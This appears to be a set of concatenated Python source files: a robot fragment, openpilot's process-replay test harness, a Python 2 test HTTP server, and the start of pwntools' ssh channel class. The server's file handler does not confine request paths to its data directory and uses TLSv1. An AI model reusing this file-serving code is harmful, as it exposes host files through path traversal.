        # Turn right
        self.motors_obj.a_forwards(self.speed)
        time.sleep(0.75)
        self.motors_obj.all_motors_off()
        '''

    def _thread(self):
        # Poll forever; avoid_obstacle() blocks ~0.5 s per maneuver.
        while True:
            if self.is_near_obstacle():
                self.avoid_obstacle()
|
process_replay.py | #!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from selfdrive.car.car_helpers import get_car
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
  """Wait up to 15 seconds for *evt* to be set.

  On timeout: the main thread raises (the tested process likely died,
  so the test must not hang); any other thread exits quietly because
  its process is done being tested.
  """
  if not evt.wait(15):
    # FIX: threading.currentThread().getName() is deprecated (removed in
    # Python 3.13); use the supported main-thread check instead.
    if threading.current_thread() is threading.main_thread():
      # tested process likely died. don't let test just hang
      raise Exception("Timeout reached. Tested process likely crashed.")
    else:
      # done testing this process, let it die
      sys.exit(0)
class FakeSocket:
  """In-memory stand-in for a messaging socket.

  In waiting mode (the default) receive/send handshake with the test
  harness through two events; with wait=False it is a plain LIFO buffer.
  """
  def __init__(self, wait=True):
    self.data = []
    self.wait = wait
    self.recv_called = threading.Event()
    self.recv_ready = threading.Event()

  def receive(self, non_blocking=False):
    """Pop the most recently queued item, handshaking if in wait mode."""
    if non_blocking:
      return None
    if not self.wait:
      return self.data.pop()
    # Signal that a receive happened, then block until data is ready.
    self.recv_called.set()
    wait_for_event(self.recv_ready)
    self.recv_ready.clear()
    return self.data.pop()

  def send(self, data):
    """Queue *data*, handshaking with a pending receive if in wait mode."""
    if not self.wait:
      self.data.append(data)
      return
    wait_for_event(self.recv_called)
    self.recv_called.clear()
    self.data.append(data)
    self.recv_ready.set()

  def wait_for_recv(self):
    """Block until the consumer has called receive()."""
    wait_for_event(self.recv_called)
class DumbSocket:
  """Socket stub that always hands back one pre-serialized message.

  Constructed with a service name it captures that service's empty
  message bytes; send() discards everything.
  """
  def __init__(self, s=None):
    if s is None:
      return
    try:
      dat = messaging.new_message(s)
    except capnp.lib.capnp.KjException:  # pylint: disable=c-extension-no-member
      # list-typed services need an explicit size
      dat = messaging.new_message(s, 0)
    self.data = dat.to_bytes()

  def receive(self, non_blocking=False):
    return self.data

  def send(self, dat):
    pass
class FakeSubMaster(messaging.SubMaster):
  """SubMaster replacement driven by the test harness.

  The tested process's update() blocks until the harness injects
  messages via update_msgs(); the two Events implement that handshake,
  so the exact set/wait/clear ordering below is load-bearing.
  """
  def __init__(self, services):
    super(FakeSubMaster, self).__init__(services, addr=None)
    # Replace real sockets with stubs that return empty messages.
    self.sock = {s: DumbSocket(s) for s in services}
    self.update_called = threading.Event()
    self.update_ready = threading.Event()
    self.wait_on_getitem = False
  def __getitem__(self, s):
    # hack to know when fingerprinting is done: while wait_on_getitem is
    # set, every data access handshakes with the harness like update().
    if self.wait_on_getitem:
      self.update_called.set()
      wait_for_event(self.update_ready)
      self.update_ready.clear()
    return self.data[s]
  def update(self, timeout=-1):
    # Called by the tested process; block until the harness feeds data.
    self.update_called.set()
    wait_for_event(self.update_ready)
    self.update_ready.clear()
  def update_msgs(self, cur_time, msgs):
    # Called by the harness; wait for the process to ask for an update,
    # then hand the messages to the real SubMaster bookkeeping.
    wait_for_event(self.update_called)
    self.update_called.clear()
    super(FakeSubMaster, self).update_msgs(cur_time, msgs)
    self.update_ready.set()
  def wait_for_update(self):
    # Block until the tested process has called update() at least once.
    wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
  """PubMaster replacement that hands published messages to the harness.

  send() blocks the tested process until the harness consumes the
  message through wait_for_msg(); the two Events implement that
  rendezvous, so the set/wait/clear ordering is load-bearing.
  """
  def __init__(self, services):  # pylint: disable=super-init-not-called
    self.data = {}
    self.sock = {}
    self.last_updated = None
    for s in services:
      try:
        data = messaging.new_message(s)
      except capnp.lib.capnp.KjException:
        # list-typed services need an explicit size
        data = messaging.new_message(s, 0)
      self.data[s] = data.as_reader()
      self.sock[s] = DumbSocket()
    self.send_called = threading.Event()
    self.get_called = threading.Event()
  def send(self, s, dat):
    # Record the published message, then block until the harness reads it.
    self.last_updated = s
    if isinstance(dat, bytes):
      self.data[s] = log.Event.from_bytes(dat)
    else:
      self.data[s] = dat.as_reader()
    self.send_called.set()
    wait_for_event(self.get_called)
    self.get_called.clear()
  def wait_for_msg(self):
    # Harness side: wait for a publish, return it, and release send().
    wait_for_event(self.send_called)
    self.send_called.clear()
    dat = self.data[self.last_updated]
    self.get_called.set()
    return dat
def fingerprint(msgs, fsm, can_sock):
  """Drive the tested process through car fingerprinting.

  Feeds the first 300 CAN messages from the log into the fake CAN
  socket, then waits for the process to come back around to its normal
  update loop.  The statement order mirrors the FakeSocket/FakeSubMaster
  event handshake and must not be rearranged.
  """
  print("start fingerprinting")
  fsm.wait_on_getitem = True
  # populate fake socket with data for fingerprinting
  canmsgs = [msg for msg in msgs if msg.which() == "can"]
  wait_for_event(can_sock.recv_called)
  can_sock.recv_called.clear()
  can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
  can_sock.recv_ready.set()
  can_sock.wait = False
  # we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
  wait_for_event(fsm.update_called)
  fsm.update_called.clear()
  fsm.wait_on_getitem = False
  # restore blocking behavior and drain leftover CAN data
  can_sock.wait = True
  can_sock.data = []
  fsm.update_ready.set()
  print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
  """Fingerprint the car from the first 300 logged CAN messages and
  store the resulting CarParams in Params."""
  fake_can = FakeSocket(wait=False)
  fake_sendcan = FakeSocket(wait=False)
  candidates = [m for m in msgs if m.which() == 'can'][:300]
  for m in candidates:
    fake_can.send(m.as_builder().to_bytes())
  _, CP = get_car(fake_can, fake_sendcan)
  Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
  """Decide which radar sockets to expect for an incoming message.

  Returns (expected socket names, should_recv flag).
  """
  if msg.which() != "can":
    return [], False
  if CP.radarOffCan:
    return ["radarState", "liveTracks"], True

  # CAN addresses carrying radar data, per car brand.
  radar_msgs_by_car = {
      "honda": [0x445],
      "toyota": [0x19f, 0x22f],
      "gm": [0x474],
      "chrysler": [0x2d4],
  }
  radar_msgs = radar_msgs_by_car.get(CP.carName)
  if radar_msgs is None:
    raise NotImplementedError

  if any(m.src == 1 and m.address in radar_msgs for m in msg.can):
    return ["radarState", "liveTracks"], True
  return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
  # calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
  # should_recv always true to increment frame
  next_frame = fsm.frame + 1  # incrementing hasn't happened yet in SubMaster
  is_odometry = msg.which() == 'cameraOdometry'
  expect_calibration = next_frame == 0 or (is_odometry and next_frame % 5 == 0)
  recv_socks = ["liveCalibration"] if expect_calibration else []
  return recv_socks, fsm.frame == 0 or is_odometry
def ublox_rcv_callback(msg):
  """Map a raw ublox (class, id) pair to the sockets it should produce."""
  key = tuple(msg.ubloxRaw[2:4])
  if key == (1, 0x70):           # NAV-PVT
    return ["gpsLocationExternal"]
  if key in ((2, 0x15), (10, 9)):  # RXM-RAWX / MON-HW
    return ["ubloxGnss"]
  return []
# Per-process replay configuration.  pub_sub maps each input socket the
# process subscribes to onto the output sockets it is expected to publish
# in response; `ignore` lists log fields excluded from comparison;
# init_callback/should_recv_callback hook process startup and per-message
# expectations; `tolerance` is the numeric comparison tolerance.
CONFIGS = [
  ProcessConfig(
    proc_name="controlsd",
    pub_sub={
      "can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
      "deviceState": [], "pandaState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
      "modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
    },
    ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
    init_callback=fingerprint,
    should_recv_callback=None,
    tolerance=NUMPY_TOLERANCE,
  ),
  ProcessConfig(
    proc_name="radard",
    pub_sub={
      "can": ["radarState", "liveTracks"],
      "liveParameters": [], "carState": [], "modelV2": [],
    },
    ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
    init_callback=get_car_params,
    should_recv_callback=radar_rcv_callback,
    tolerance=None,
  ),
  ProcessConfig(
    proc_name="plannerd",
    pub_sub={
      "modelV2": ["lateralPlan"], "radarState": ["longitudinalPlan"],
      "carState": [], "controlsState": [], "liveParameters": [],
    },
    ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay"],
    init_callback=get_car_params,
    should_recv_callback=None,
    tolerance=None,
  ),
  ProcessConfig(
    proc_name="calibrationd",
    pub_sub={
      "carState": ["liveCalibration"],
      "cameraOdometry": []
    },
    ignore=["logMonoTime", "valid"],
    init_callback=get_car_params,
    should_recv_callback=calibration_rcv_callback,
    tolerance=None,
  ),
  ProcessConfig(
    proc_name="dmonitoringd",
    pub_sub={
      "driverState": ["driverMonitoringState"],
      "liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
    },
    ignore=["logMonoTime", "valid"],
    init_callback=get_car_params,
    should_recv_callback=None,
    tolerance=NUMPY_TOLERANCE,
  ),
  ProcessConfig(
    proc_name="locationd",
    pub_sub={
      "cameraOdometry": ["liveLocationKalman"],
      "sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
    },
    ignore=["logMonoTime", "valid"],
    init_callback=get_car_params,
    should_recv_callback=None,
    tolerance=NUMPY_TOLERANCE,
  ),
  ProcessConfig(
    proc_name="paramsd",
    pub_sub={
      "liveLocationKalman": ["liveParameters"],
      "carState": []
    },
    ignore=["logMonoTime", "valid"],
    init_callback=get_car_params,
    should_recv_callback=None,
    tolerance=NUMPY_TOLERANCE,
  ),
  ProcessConfig(
    proc_name="ubloxd",
    pub_sub={
      "ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
    },
    ignore=["logMonoTime"],
    init_callback=None,
    should_recv_callback=ublox_rcv_callback,
    tolerance=None,
  ),
]
def replay_process(cfg, lr):
  """Replay log *lr* through the process described by *cfg*, choosing
  the python or cpp harness based on how the process is managed."""
  is_python = isinstance(managed_processes[cfg.proc_name], PythonProcess)
  handler = python_replay_process if is_python else cpp_replay_process
  return handler(cfg, lr)
def python_replay_process(cfg, lr):
  """Replay log *lr* through a Python-managed process in-process.

  Wires FakeSubMaster/FakePubMaster/FakeSocket into the process's main()
  (run on a daemon thread), feeds it the logged input messages, and
  collects everything it publishes.  Statement order follows the event
  handshakes of the fakes and must not be rearranged.
  """
  sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
  pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
  fsm = FakeSubMaster(pub_sockets)
  fpm = FakePubMaster(sub_sockets)
  args = (fsm, fpm)
  # CAN is delivered through a dedicated fake socket, not the SubMaster.
  if 'can' in list(cfg.pub_sub.keys()):
    can_sock = FakeSocket()
    args = (fsm, fpm, can_sock)
  all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
  pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
  # Reset params to a known-good replay state.
  params = Params()
  params.clear_all()
  params.manager_start()
  params.put("OpenpilotEnabledToggle", "1")
  params.put("Passive", "0")
  params.put("CommunityFeaturesToggle", "1")
  os.environ['NO_RADAR_SLEEP'] = "1"
  os.environ['SKIP_FW_QUERY'] = "1"
  os.environ['FINGERPRINT'] = ""
  # Pin the fingerprint from the log so the process skips live detection.
  for msg in lr:
    if msg.which() == 'carParams':
      os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
  assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
  managed_processes[cfg.proc_name].prepare()
  mod = importlib.import_module(managed_processes[cfg.proc_name].module)
  # Run the tested process's main() on a daemon thread with the fakes.
  thread = threading.Thread(target=mod.main, args=args)
  thread.daemon = True
  thread.start()
  if cfg.init_callback is not None:
    if 'can' not in list(cfg.pub_sub.keys()):
      can_sock = None
    cfg.init_callback(all_msgs, fsm, can_sock)
  CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
  # wait for started process to be ready
  if 'can' in list(cfg.pub_sub.keys()):
    can_sock.wait_for_recv()
  else:
    fsm.wait_for_update()
  log_msgs, msg_queue = [], []
  for msg in tqdm(pub_msgs, disable=CI):
    if cfg.should_recv_callback is not None:
      recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
    else:
      # Default expectation: any output whose publish frequency divides
      # the input's frequency fires on this frame.
      recv_socks = [s for s in cfg.pub_sub[msg.which()] if
                    (fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
      should_recv = bool(len(recv_socks))
    if msg.which() == 'can':
      can_sock.send(msg.as_builder().to_bytes())
    else:
      msg_queue.append(msg.as_builder())
    if should_recv:
      fsm.update_msgs(0, msg_queue)
      msg_queue = []
      # Drain publishes until every expected socket has produced output.
      recv_cnt = len(recv_socks)
      while recv_cnt > 0:
        m = fpm.wait_for_msg()
        log_msgs.append(m)
        recv_cnt -= m.which() in recv_socks
  return log_msgs
def cpp_replay_process(cfg, lr):
  """Replay log *lr* through a natively-managed (C++) process.

  Starts the real process, publishes the logged inputs over real
  messaging sockets, and collects the responses it publishes.
  """
  sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]  # We get responses here
  pm = messaging.PubMaster(cfg.pub_sub.keys())
  sockets = {s: messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
  all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
  pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
  managed_processes[cfg.proc_name].prepare()
  managed_processes[cfg.proc_name].start()
  time.sleep(1)  # We give the process time to start
  log_msgs = []
  # Drain any stale messages queued before the replay begins.
  for s in sub_sockets:
    messaging.recv_one_or_none(sockets[s])
  for msg in tqdm(pub_msgs, disable=CI):
    pm.send(msg.which(), msg.as_builder())
    resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
    for s in resp_sockets:
      response = messaging.recv_one(sockets[s])
      if response is not None:
        log_msgs.append(response)
  managed_processes[cfg.proc_name].stop()
  return log_msgs
|
simple_http_server.py | import os
import urlparse
import datetime
import threading
import mimetools
import socket
import errno
import sys
import select
import time
import json
import xlog
# Module-level logger used throughout this file.
# NOTE: this deliberately shadows the stdlib `logging` name with an
# xlog.Logger instance (warn/info/exception-style API).
logging = xlog.Logger()
class HttpServerHandler():
    """Minimal per-connection HTTP request handler (Python 2).

    One instance is created per accepted connection; handle() reads and
    dispatches requests until the connection should close.  Subclasses
    override the do_* methods.  Uses Python 2-only APIs
    (mimetools.Message, socket._fileobject).
    """
    # Version assumed when the request line omits one.
    default_request_version = "HTTP/1.1"
    # Header parser class (Python 2 mimetools).
    MessageClass = mimetools.Message
    # Read fully buffered; write unbuffered so responses go out promptly.
    rbufsize = -1
    wbufsize = 0
    def __init__(self, sock, client, args):
        """Wrap *sock* in buffered file objects and run subclass setup().

        :param sock: accepted connection socket
        :param client: client address tuple
        :param args: opaque per-server arguments for subclasses
        """
        self.connection = sock
        self.rfile = socket._fileobject(self.connection, "rb", self.rbufsize)
        self.wfile = socket._fileobject(self.connection, "wb", self.wbufsize)
        self.client_address = client
        self.args = args
        self.setup()
    def setup(self):
        # Hook for subclasses; default does nothing.
        pass
    def handle(self):
        """Serve requests on this connection until it should close."""
        #logging.info('Connected from %r', self.client_address)
        while True:
            try:
                # Default to closing; handle_one_request() re-enables
                # keep-alive after a successful request.
                self.close_connection = 1
                self.handle_one_request()
            except Exception as e:
                #logging.warn("handle err:%r close", e)
                self.close_connection = 1
            if self.close_connection:
                break
        self.connection.close()
        #logging.debug("closed from %s:%d", self.client_address[0], self.client_address[1])
    def address_string(self):
        # "host:port" form of the client address.
        return '%s:%s' % self.client_address[:2]
    def parse_request(self):
        """Parse self.raw_requestline into command/path/version + headers.

        Returns True on success; on failure sends an error response and
        returns False.  Also sets self.close_connection from the HTTP
        version and the Connection header.
        """
        self.command = None  # set in case of error on the first line
        self.request_version = version = self.default_request_version
        requestline = self.raw_requestline
        requestline = requestline.rstrip('\r\n')
        self.requestline = requestline
        words = requestline.split()
        if len(words) == 3:
            command, path, version = words
            if version[:5] != 'HTTP/':
                self.send_error(400, "Bad request version (%r)" % version)
                return False
            try:
                base_version_number = version.split('/', 1)[1]
                version_number = base_version_number.split(".")
                # RFC 2145 section 3.1 says there can be only one "." and
                #   - major and minor numbers MUST be treated as
                #      separate integers;
                #   - HTTP/2.4 is a lower version than HTTP/2.13, which in
                #      turn is lower than HTTP/12.3;
                #   - Leading zeros MUST be ignored by recipients.
                if len(version_number) != 2:
                    raise ValueError
                version_number = int(version_number[0]), int(version_number[1])
            except (ValueError, IndexError):
                self.send_error(400, "Bad request version (%r)" % version)
                return False
            if version_number >= (1, 1):
                # HTTP/1.1 defaults to keep-alive.
                self.close_connection = 0
            if version_number >= (2, 0):
                self.send_error(505,
                                "Invalid HTTP Version (%s)" % base_version_number)
                return False
        elif len(words) == 2:
            # HTTP/0.9-style request: "GET /path" only.
            command, path = words
            self.close_connection = 1
            if command != 'GET':
                self.send_error(400,
                                "Bad HTTP/0.9 request type (%r)" % command)
                return False
        elif not words:
            return False
        else:
            self.send_error(400, "Bad request syntax (%r)" % requestline)
            return False
        self.command, self.path, self.request_version = command, path, version
        # Examine the headers and look for a Connection directive
        self.headers = self.MessageClass(self.rfile, 0)
        conntype = self.headers.get('Connection', "")
        if conntype.lower() == 'close':
            self.close_connection = 1
        elif conntype.lower() == 'keep-alive':
            self.close_connection = 0
        return True
    def handle_one_request(self):
        """Read one request line, dispatch to the matching do_* method."""
        try:
            try:
                # 65537 so an over-long line is detectable below.
                self.raw_requestline = self.rfile.readline(65537)
            except Exception as e:
                #logging.warn("simple server handle except %r", e)
                return
            if len(self.raw_requestline) > 65536:
                #logging.warn("recv command line too large")
                return
            if not self.raw_requestline:
                #logging.warn("closed")
                return
            self.parse_request()
            if self.command == "GET":
                self.do_GET()
            elif self.command == "POST":
                self.do_POST()
            elif self.command == "CONNECT":
                self.do_CONNECT()
            elif self.command == "HEAD":
                self.do_HEAD()
            elif self.command == "DELETE":
                self.do_DELETE()
            elif self.command == "OPTIONS":
                self.do_OPTIONS()
            elif self.command == "PUT":
                self.do_PUT()
            else:
                logging.warn("unhandler cmd:%s", self.command)
                return
            self.wfile.flush() #actually send the response if not already done.
            # Request handled successfully: allow keep-alive.
            self.close_connection = 0
        except socket.error as e:
            #logging.warn("socket error:%r", e)
            pass
        except IOError as e:
            if e.errno == errno.EPIPE:
                logging.warn("PIPE error:%r", e)
                pass
            else:
                logging.warn("IOError:%r", e)
                pass
        #except OpenSSL.SSL.SysCallError as e:
        #    logging.warn("socket error:%r", e)
        except Exception as e:
            logging.exception("handler:%r", e)
            pass
    # Method stubs; subclasses implement the verbs they support.
    def do_GET(self):
        pass
    def do_POST(self):
        pass
    def do_PUT(self):
        pass
    def do_DELETE(self):
        pass
    def do_OPTIONS(self):
        pass
    def do_HEAD(self):
        pass
    def do_CONNECT(self):
        pass
    def send_not_found(self):
        # Fixed 404 response with connection close.
        self.wfile.write(b'HTTP/1.1 404\r\nContent-Type: text/plain\r\nConnection: close\r\n\r\n404 Not Found')
    def send_error(self, code, message=None):
        """Send a bare status-line error response, optionally with a body."""
        self.wfile.write('HTTP/1.1 %d\r\n' % code)
        self.wfile.write('Connection: close\r\n\r\n')
        if message:
            self.wfile.write(message)
    def send_response(self, mimetype="", content="", headers="", status=200):
        """Send a full response; headers may be a dict or a raw string."""
        data = []
        data.append('HTTP/1.1 %d\r\n' % status)
        if len(mimetype):
            data.append('Content-Type: %s\r\n' % mimetype)
        data.append('Content-Length: %s\r\n' % len(content))
        if len(headers):
            if isinstance(headers, dict):
                for key in headers:
                    data.append("%s: %s\r\n" % (key, headers[key]))
            elif isinstance(headers, basestring):
                data.append(headers)
        data.append("\r\n")
        # Small bodies are coalesced into a single write.
        if len(content) < 1024:
            data.append(content)
            data_str = "".join(data)
            self.wfile.write(data_str)
        else:
            data_str = "".join(data)
            self.wfile.write(data_str)
            if len(content):
                self.wfile.write(content)
    def send_file(self, filename, mimetype):
        """Stream *filename* to the client with caching headers."""
        try:
            if not os.path.isfile(filename):
                self.send_not_found()
                return
            file_size = os.path.getsize(filename)
            tme = (datetime.datetime.today()+datetime.timedelta(minutes=330)).strftime('%a, %d %b %Y %H:%M:%S GMT')
            head = 'HTTP/1.1 200\r\nAccess-Control-Allow-Origin: *\r\nCache-Control:public, max-age=31536000\r\n'
            head += 'Expires: %s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n' % (tme, mimetype, file_size)
            self.wfile.write(head.encode())
            with open(filename, 'rb') as fp:
                while True:
                    data = fp.read(65535)
                    if not data:
                        break
                    self.wfile.write(data)
        except:
            pass
            #logging.warn("download broken")
    def response_json(self, res_arr):
        # Serialize and send as application/json.
        data = json.dumps(res_arr, indent=0, sort_keys=True)
        self.send_response('application/json', data)
class HTTPServer():
    """select()-based multi-port TCP server dispatching to a handler class.

    Each accepted connection is handed to a new `handler` instance on
    its own thread.  Optionally wraps listening sockets in TLS via
    pyOpenSSL.
    """
    def __init__(self, address, handler, args=(), use_https=False, cert=""):
        """:param address: (host, port) tuple, or a list of them
        :param handler: handler class instantiated per connection
        :param args: opaque arguments forwarded to the handler
        :param use_https: wrap listeners with pyOpenSSL TLS
        :param cert: path to a PEM with key + certificate (when use_https)
        """
        self.sockets = None
        self.running = True
        if isinstance(address, tuple):
            self.server_address = [address]
        else:
            #server can listen multi-port
            self.server_address = address
        self.handler = handler
        self.args = args
        self.use_https = use_https
        self.cert = cert
        self.init_socket()
        #logging.info("server %s:%d started.", address[0], address[1])
    def init_socket(self):
        """(Re)create and bind all listening sockets."""
        if self.sockets is not None:
            self.server_close()
        self.sockets = []
        for addr in self.server_address:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Allow fast restart on the same port.
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            try:
                sock.bind(addr)
            except Exception as e:
                logging.error("bind to %s:%d fail", addr[0], addr[1])
                raise e
            if self.use_https:
                import OpenSSL
                ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
                #server.pem's location (containing the server private key and the server certificate).
                fpem = self.cert
                ctx.use_privatekey_file(fpem)
                ctx.use_certificate_file(fpem)
                sock = OpenSSL.SSL.Connection(ctx, sock)
            sock.listen(200)
            self.sockets.append(sock)
            logging.info("server %s:%d started.", addr[0], addr[1])
    def serve_forever(self):
        """Accept loop; runs until shutdown() clears self.running."""
        while self.running:
            # 1s timeout so shutdown() is noticed promptly.
            r, w, e = select.select(self.sockets, [], [], 1)
            for rsock in r:
                try:
                    (sock, address) = rsock.accept()
                except IOError as e:
                    logging.warn("socket accept fail(errno: %s).", e.args[0])
                    if e.args[0] == 10022:
                        # WSAEINVAL (Windows): listener is broken; rebuild it.
                        logging.info("restart socket server.")
                        self.init_socket()
                    # NOTE(review): on any accept failure the rest of this
                    # select round is abandoned — confirm `break` placement
                    # is intended for non-10022 errors too.
                    break
                self.process_connect(sock, address)
    def process_connect(self, sock, address):
        """Spawn a handler thread for an accepted connection."""
        #logging.debug("connect from %s:%d", address[0], address[1])
        client_obj = self.handler(sock, address, self.args)
        client_thread = threading.Thread(target=client_obj.handle)
        client_thread.start()
    def shutdown(self):
        # Stops serve_forever() after at most one select timeout.
        self.running = False
    def server_close(self):
        # Close every listening socket.
        for sock in self.sockets:
            sock.close()
class TestHttpServer(HttpServerHandler):
    """Test handler: serves '/', an endless '/null' data stream, and
    files under a data directory (Python 2: uses the `urlparse` module)."""
    def __init__(self, sock, client, args):
        # args carries the data directory path for file serving.
        self.data_path = args
        HttpServerHandler.__init__(self, sock, client, args)
    def generate_random_lowercase(self, n):
        """Return a bytearray of n random lowercase ASCII letters."""
        min_lc = ord(b'a')
        len_lc = 26
        ba = bytearray(os.urandom(n))
        for i, b in enumerate(ba):
            ba[i] = min_lc + b % len_lc  # convert 0..255 to 97..122
        #sys.stdout.buffer.write(ba)
        return ba
    def do_GET(self):
        url_path = urlparse.urlparse(self.path).path
        req = urlparse.urlparse(self.path).query
        reqs = urlparse.parse_qs(req, keep_blank_values=True)
        #logging.debug("GET %s from %s:%d", self.path, self.client_address[0], self.client_address[1])
        if url_path == '/':
            # Health check.
            data = "OK\r\n"
            self.wfile.write('HTTP/1.1 200\r\nAccess-Control-Allow-Origin: *\r\nContent-Length: %d\r\n\r\n%s' %(len(data), data) )
        elif url_path == '/null':
            # Bandwidth test: stream `size` bytes (default 1 GiB) of
            # pseudo-random lowercase data in 64 KiB chunks.
            mimetype = "application/x-binary"
            if "size" in reqs:
                file_size = int(reqs['size'][0])
            else:
                file_size = 1024 * 1024 * 1024
            self.wfile.write('HTTP/1.1 200\r\nContent-Type: %s\r\nContent-Length: %s\r\n\r\n' % (mimetype, file_size))
            start = 0
            data = self.generate_random_lowercase(65535)
            while start < file_size:
                left = file_size - start
                send_batch = min(left, 65535)
                self.wfile.write(data[:send_batch])
                start += send_batch
        else:
            # Serve a file relative to the data directory.
            target = os.path.abspath(os.path.join(self.data_path, url_path[1:]))
            if os.path.isfile(target):
                self.send_file(target, "application/x-binary")
            else:
                self.wfile.write('HTTP/1.1 404\r\nContent-Length: 0\r\n\r\n' )
def main(data_path="."):
    """Start the test HTTP server on port 8880 and block forever.

    :param data_path: directory served by TestHttpServer
    """
    logging.info("listen http on 8880")
    server = HTTPServer(('', 8880), TestHttpServer, data_path)
    worker = threading.Thread(target=server.serve_forever)
    worker.setDaemon(True)
    worker.start()
    # Keep the main thread alive; the daemon worker dies with it.
    while True:
        time.sleep(10)
if __name__ == "__main__":
    # Use the first CLI argument as the served data directory, else cwd.
    # BUG FIX: the original checked `len(sys.argv) > 2`, which silently
    # ignored a single path argument — sys.argv[1] exists whenever
    # len(sys.argv) > 1.
    if len(sys.argv) > 1:
        data_path = sys.argv[1]
    else:
        data_path = "."
    try:
        main(data_path=data_path)
    except Exception:
        import traceback
        traceback.print_exc(file=sys.stdout)
    except KeyboardInterrupt:
        sys.exit()
|
ssh.py | from __future__ import absolute_import
import inspect
import logging
import os
import re
import shutil
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.process import process
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
#     No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
# FIX: the original used the Python 2-only file() builtin to open
# /dev/null (non-portable, holds an fd open).  NullHandler discards
# records without any of that.
h = logging.NullHandler()
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
    """A single channel (remote process or shell) on an ssh connection."""

    #: Parent :class:`ssh` object
    parent = None

    #: Remote host
    host = None

    #: Return code, or :const:`None` if the process has not returned
    #: Use :meth:`poll` to check.
    returncode = None

    #: :const:`True` if a tty was allocated for this channel
    tty = False

    #: Environment specified for the remote process, or :const:`None`
    #: if the default environment was used
    env = None

    #: Command specified for the constructor
    process = None

    def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
        super(ssh_channel, self).__init__(*args, **kwargs)

        # keep the parent from being garbage collected in some cases
        self.parent = parent

        self.returncode = None
        self.host = parent.host
        self.tty = tty
        self.env = env
        self.process = process
        self.cwd = wd or '.'
        env = env or {}

        msg = 'Opening new channel: %r' % (process or 'shell')

        if isinstance(process, (list, tuple)):
            process = ' '.join(sh_string(s) for s in process)

        if process and wd:
            process = 'cd %s >/dev/null 2>&1;%s' % (sh_string(wd), process)

        if process and env:
            for name, value in env.items():
                if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
                    # BUG FIX: the format string used '$r' instead of '%r',
                    # which made the '%' operator raise TypeError ("not all
                    # arguments converted") instead of reporting the key.
                    self.error('run(): Invalid environment key %r' % name)
                process = 'export %s=%s;%s' % (name, sh_string(value), process)

        if process and tty:
            if raw:
                process = 'stty raw -ctlecho -echo; ' + process
            else:
                process = 'stty -ctlecho -echo; ' + process

        # If this object is enabled for DEBUG-level logging, don't hide
        # anything about the command that's actually executed.
        if process and self.isEnabledFor(logging.DEBUG):
            msg = 'Opening new channel: %r' % ((process,) or 'shell')

        with self.waitfor(msg) as h:
            import paramiko
            try:
                self.sock = parent.transport.open_session()
            except paramiko.ChannelException as e:
                if e.args == (1, 'Administratively prohibited'):
                    self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
                raise e

            if self.tty:
                self.sock.get_pty('xterm', term.width, term.height)

                # Keep the remote pty size in sync with the local terminal.
                def resizer():
                    if self.sock:
                        try:
                            self.sock.resize_pty(term.width, term.height)
                        except paramiko.ssh_exception.SSHException:
                            pass

                self.resizer = resizer
                term.term.on_winch.append(self.resizer)
            else:
                self.resizer = None

            # Put stderr on stdout. This might not always be desirable,
            # but our API does not support multiple streams
